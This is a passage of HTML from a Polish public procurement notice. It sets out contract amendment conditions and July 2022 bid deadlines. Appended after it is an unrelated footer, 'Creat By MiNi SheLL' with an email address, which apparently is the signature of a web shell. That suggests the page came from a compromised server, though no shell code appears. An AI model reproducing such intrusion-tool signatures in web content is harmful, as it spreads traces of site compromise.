Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana Umowy jest dopuszczalna w przypadku gdy zachodzi co najmniej jedna z okoliczności:<br/>1) zmiana stawki podatku VAT w toku wykonywania Umowy – do ceny netto zostanie doliczona stawka VAT obowiązująca<br/>w dniu wystawienia faktury;<br/>2) wejście w życie innych, niż wymienione w ust. 1, regulacji prawnych po dacie zawarcia Umowy, wywołujących potrzebę<br/>jej zmiany;<br/>3) zmiana kosztów związanych z realizacją Umowy (na podstawie art. 436 pkt 4 lit. b Pzp), z powodu:<br/>a) zmiany minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002<br/>r. o minimalnym wynagrodzeniu za pracę (tekst jedn. - Dz. U. z 2020 r., poz. 2207) - Strony dokonają odpowiedniej zmiany<br/>wynagrodzenia należnego Wykonawcy, a zmiana dotyczyć będzie tej części wynagrodzenia umownego, którą stanowi<br/>wynagrodzenie osób wykonujących przedmiot umowy i zatrudnionych u Wykonawcy w ramach stosunku pracy na pełny etat<br/>za minimalne wynagrodzenie za pracę lub zatrudnionych w ramach stosunku pracy na część etatu za proporcjonalną do<br/>części etatu wysokość minimalnego wynagrodzenia za pracę.<br/>b) zmiany wysokości składki na ubezpieczenie społeczne lub zdrowotne - Strony dokonają odpowiedniej zmiany<br/>wynagrodzenia należnego Wykonawcy, a zmiana dotyczyć będzie tej części wynagrodzenia, którą stanowi wynagrodzenie osób wykonujących przedmiot umowy i zatrudnionych u Wykonawcy w ramach stosunku pracy, poprzez jej obniżenie lub<br/>podwyższenie równe odpowiednio wartości obniżenia lub podwyższenia wysokości tych składek;<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu - Strony dokonają odpowiedniej<br/>zmiany wynagrodzenia należnego Wykonawcy, a zmiana dotyczyć będzie tej części wynagrodzenia Wykonawcy, którą<br/>regulować będą zmienione zasady podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu;<br/>d) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (tekst jedn. - Dz. U. z 2020r., poz. 1342 z późn. zm.) - Strony<br/>dokonają odpowiedniej zmiany wynagrodzenia należnego Wykonawcy, a zmiana dotyczyć będzie tej części wynagrodzenia<br/>Wykonawcy, którą regulować będą zmieniane zasady gromadzenia i wysokości wpłat do pracowniczych planów<br/>kapitałowych; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umed-wroc.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-01 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com